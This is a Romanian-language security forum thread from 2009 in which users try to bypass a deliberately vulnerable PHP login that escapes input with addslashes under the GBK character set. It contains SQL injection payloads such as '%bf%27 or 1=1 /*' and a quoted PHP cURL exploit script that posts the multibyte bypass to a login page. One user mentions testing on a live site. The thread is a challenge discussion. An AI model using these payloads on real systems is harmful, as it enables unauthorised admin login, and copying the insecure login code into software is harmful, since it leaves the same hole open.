Hertz Posted October 7, 2009 Report Posted October 7, 2009 Se da codul sursa al unei pagini.Care ar fii queryul ideal pentru extragerea datelor / logarea ca Admin.<?phpfunction asvsmysql_login($username, $password){ $username = addslashes($username); $password = md5($password); $db = new Database(); $db->setHost('localhost'); $db->setDatabase(ADDSLASH_DATABASE); $db->setUser(ADDSLASH_USERNAME); $db->setPassword(ADDSLASH_PASSWORD); if (false === $db->connect()) { return htmlDisplayError('Conectare nereusita.'); } $db->query("SET NAMES GBK"); $db->query("SET CHARACTER SET GBK"); $query = "SELECT username FROM users WHERE username='$username' AND password='$password'"; if (false === ($result = $db->queryFirst($query))) { return htmlDisplayError('User/Parola gresite..'); } if ($result['username'] !== 'Admin') { return htmlDisplayError('Esti logat,dar nu ca Admin.'); } return htmlDisplayMessage('Esti logat,felicitari!');}?> Quote
ZeroCold Posted October 7, 2009 Report Posted October 7, 2009 SELECT username FROM admin WHERE username='$username' AND password='$password' --???(nus sigur ) )... Quote
Nytro Posted October 7, 2009 Report Posted October 7, 2009 (edited) username='$username' si password='$password' - Nu trebuia cumva sa folosesti ghilimele duble?Si nu vad cum s-ar putea apela functia din browser... Sa presupunem ca folosim GET pentru username si password:username=Adminpassword=' OR 1=1'Ceva de genul. Login bypass.Edit: Nu e bine, nu m-am uitat la inceput. Edited October 7, 2009 by Nytro Quote
loki Posted October 7, 2009 Report Posted October 7, 2009 misto ideea.Tentant ar fi de construit un site simplu cu codul de mai sus... dar presupun ca aflarea solutiei presupune doar citirea codului?...m-as baga mai tarziu (da nu stiu daca am timp azi) sa bag pe un host sursa, o baza de date si sa ofer situl pentru incercari. Imi place ideea.PS cred ca voiai sa zici ' OR 1 OR ' sau ' OR 1=1 OR ' Quote
Hertz Posted October 7, 2009 Author Report Posted October 7, 2009 L-as pune sus daca as avea unde.Anyway.Acest challenge tine numai si numai de addslashes Quote
michee Posted October 8, 2009 Report Posted October 8, 2009 se foloseste faptul ca-i charset-ul GBK si se face escape cu addslashes.apoi cred ca se poate injecta blind....asa la o prima privire Quote
ZeroCold Posted October 8, 2009 Report Posted October 8, 2009 SELECT username FROM users WHERE username=addslashes($username) AND password=addslashes(' OR 1=1 OR '):D:D Quote
Nytro Posted October 8, 2009 Report Posted October 8, 2009 Dar nici nu trebuia sa fie facut de el. Nu conteaza de cine e facut. Quote
michee Posted October 9, 2009 Report Posted October 9, 2009 se baga asa %bf%27 or 1=1 /**pe site-ul original imi apare you're logged in but not as Admin! Quote
ioinel Posted October 9, 2009 Report Posted October 9, 2009 nytro, stiu. am postat site-ul doar ca sa poata toti sa testeze acolo. are cineva un link cu tutorial la vulnerabilitatea aia? Quote
loki Posted October 9, 2009 Report Posted October 9, 2009 am incercat destule, intr-adevar ideea ar fi sa ajungi la query genFROM users WHERE username='admin' OR 1 OR 'ceva' AND password=''";addslashes iti transforma '\ si se pare ca singura metoda viabila este utilizatul caracterelor de UTF8 (situl e intr-o limba asiatica deci primeste, cum a zis michee)Problema e ca mi-au esuat toate incercarile, trebuie testat programul separat, din ochi la cea mai mica greseala se comporta la fel. Quote
ioinel Posted October 9, 2009 Report Posted October 9, 2009 Eu am gasit doar asta, dar n-am acum timp si nici un host pe care sa-l pun sa incerc.SQL Injection - HakipediaIn rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are construed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'.This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) and is followed by an non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:<?php$url = "http://www.victimsite.com/login.php";$ref = "http://www.victimsite.com/index.php";$session = "PHPSESSID=abcdefg01234567890abcdefg";$ch = curl_init();curl_setopt( $ch, CURLOPT_URL, $url );curl_setopt( $ch, CURLOPT_REFERER, $ref );curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE );curl_setopt( $ch, CURLOPT_COOKIE, $session );curl_setopt( $ch, CURLOPT_POST, TRUE );curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" . chr(0xbf) . chr(0x27) . "OR 1=1/*&submit=1" );$data = curl_exec( $ch );print( $data );curl_close( $ch );?>The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking. Quote
